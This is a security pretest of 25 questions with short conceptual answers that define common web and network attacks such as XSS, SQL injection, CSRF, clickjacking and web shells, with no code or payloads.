Pretest 2

Question 1

What is Cross-Site Scripting (XSS)?

Answer 1

A vulnerability where an attacker injects malicious scripts into webpages viewed by other users. The script runs in the context of the victim’s browser, allowing attackers to steal information, impersonate users, or manipulate webpage content.

Question 2

What is SQL Injection?

Answer 2

SQL Injection is a code injection technique where malicious SQL statements are inserted into an input field (such as a search or login form) to manipulate a database. It allows attackers to retrieve, modify, or delete data from a database, potentially leading to unauthorized access.

Question 3

What is Cross-Site Request Forgery (CSRF)?

Answer 3

CSRF is an attack where a user is tricked into performing an action on a website without their consent, often by clicking a link or visiting a malicious website. If the user is authenticated, CSRF can make unauthorized requests on their behalf, such as changing account settings or transferring funds.

Question 4

What is Command Injection?

Answer 4

Command Injection occurs when an attacker inserts malicious commands into a web application’s input fields, which are then executed by the server’s operating system. This can lead to unauthorized access, data manipulation, or execution of arbitrary commands.

Question 5

What is a Man-in-the-Middle (MITM) Attack?

Answer 5

A Man-in-the-Middle (MITM) attack occurs when an attacker intercepts communication between two parties (e.g., a user and a website) and may modify, steal, or inject malicious data into the communication without either party knowing.

Question 6

What is Directory Traversal?

Answer 6

Directory Traversal (or Path Traversal) is an attack where an attacker manipulates input in a URL to access files or directories that are outside of the intended directory. This can allow access to sensitive files on the server.

Question 7

What is Clickjacking?

Answer 7

Clickjacking is a technique where a malicious actor tricks a user into clicking something different from what the user perceives, essentially hijacking their click. This can cause users to perform unintended actions, such as changing settings or initiating transactions.

Question 8

What is Session Fixation?

Answer 8

Session Fixation is a type of attack where an attacker sets a user’s session ID before the user logs in. If the user then logs in with that session ID, the attacker can hijack the session and impersonate the user.

Question 9

What is a Denial-of-Service (DoS) Attack?

Answer 9

A Denial-of-Service (DoS) attack aims to make a system or service unavailable to its intended users by overwhelming it with a flood of traffic or exploiting weaknesses in the system.

Question 10

What is Distributed Denial-of-Service (DDoS)?

Answer 10

A Distributed Denial-of-Service (DDoS) attack is a type of DoS attack where the attack traffic is generated from multiple sources, usually a network of compromised machines (a botnet). This makes it harder to mitigate compared to a DoS attack from a single source.

Question 11

What is Privilege Escalation?

Answer 11

Privilege Escalation occurs when a user or process gains higher privileges than originally assigned. This can allow attackers to gain unauthorized access to restricted systems or data.

Question 12

What is Password Cracking?

Answer 12

Password Cracking refers to the process of attempting to recover passwords from stored or transmitted data by using various techniques like brute force, dictionary attacks, or exploiting weak hashing algorithms.

Question 13

What is Subdomain Takeover?

Answer 13

Subdomain Takeover happens when an attacker takes control of a subdomain that was previously registered but is no longer in use (for example, due to misconfiguration or deletion of the associated service). The attacker can then host malicious content on the subdomain.

Question 14

What is Cross-Site Script Inclusion (XSSI)?

Answer 14

Cross-Site Script Inclusion (XSSI) occurs when a web application allows a malicious script to include a sensitive JSON or JavaScript file from a different domain. This can lead to data leakage or unauthorized access to APIs.

Question 15

What is Remote File Inclusion (RFI)?

Answer 15

Remote File Inclusion (RFI) is a vulnerability where an attacker can include files from remote servers in an application, leading to arbitrary code execution or data exposure. This typically occurs due to improper validation of file input in the application.

Question 16

What is a Session Hijacking Attack?

Answer 16

Session Hijacking is when an attacker steals a valid session token or cookie, allowing them to impersonate a legitimate user and gain unauthorized access to their session or account.

Question 17

What is a Zero-Day Attack?

Answer 17

A Zero-Day Attack takes advantage of a previously unknown vulnerability in software or hardware, which has not yet been patched or addressed by the vendor. Since no patch exists, it is especially dangerous.

Question 18

What is a Security Misconfiguration?

Answer 18

Security Misconfiguration occurs when a system, server, or application is set up with insecure default settings or is not properly secured. This can leave systems vulnerable to attacks, such as open ports or unnecessary services running.

Question 19

What is a Social Engineering Attack?

Answer 19

Social Engineering involves manipulating or deceiving individuals into divulging confidential information, often by impersonating someone they trust. Common examples include phishing and pretexting.

Question 20

What is an API Security Vulnerability?

Answer 20

API Security Vulnerabilities refer to weaknesses in an application’s API (Application Programming Interface) that can be exploited by attackers. These vulnerabilities can include issues like improper authentication, lack of input validation, or insecure data exposure.

Question 21

What is a Phishing Attack?

Answer 21

Phishing is a social engineering attack where an attacker impersonates a legitimate entity (such as a bank or email provider) to trick the target into revealing sensitive information like usernames, passwords, or credit card numbers, often via fraudulent emails or websites.

Question 22

What is a DNS Spoofing Attack?

Answer 22

DNS Spoofing (or DNS Cache Poisoning) is an attack where the attacker manipulates DNS records to redirect traffic from a legitimate website to a malicious one. This can be used for phishing or malware distribution.

Question 23

What is a Session Replay Attack?

Answer 23

Session Replay is an attack where an attacker captures and replays a user’s session data (such as login credentials or transactions) to gain unauthorized access or perform malicious actions.

Question 24

What is an Insider Threat?

Answer 24

An Insider Threat refers to a security threat that originates from within an organization. This can involve employees, contractors, or others with authorized access who intentionally or unintentionally cause harm, such as stealing data or introducing vulnerabilities.

Question 25

What is Web Shell?

Answer 25

A Web Shell is a script (often PHP, ASP, or other server-side languages) uploaded to a web server that allows an attacker to remotely control the server. It provides an interface for attackers to run commands on the server, often as a method of exploiting server vulnerabilities.